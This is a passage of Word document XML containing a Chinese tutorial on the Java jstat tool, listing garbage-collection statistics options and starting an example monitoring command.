        <w:t>：统计</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gc</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的情况，（同</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-gcutil</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）和引起</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gc</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>-gcnew</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：统计</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gc</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时，新生代的情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>-gcnewcapacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：统计</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gc</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时，新生代</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>容量</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>-gcold</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：统计</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gc</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时，老年区的情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>-gcoldcapacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：统计</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gc</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时，老年区</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>容量</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>-gcpermcapacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：统计</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gc</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>permanent</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>区</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>容量</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>-gcutil</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：统计</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gc</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-printcompilation</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：不知道干什么的，一直没用过。</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>一般比较常用的几个参数是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00633228" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="135255"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="251" name="图片 9" descr="收藏代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收藏代码"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="135255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00633228" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>jstat -</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t> 27629 </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t> 3000 </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t> 10 </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>每隔</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>秒监控一次，一共做</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>次</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
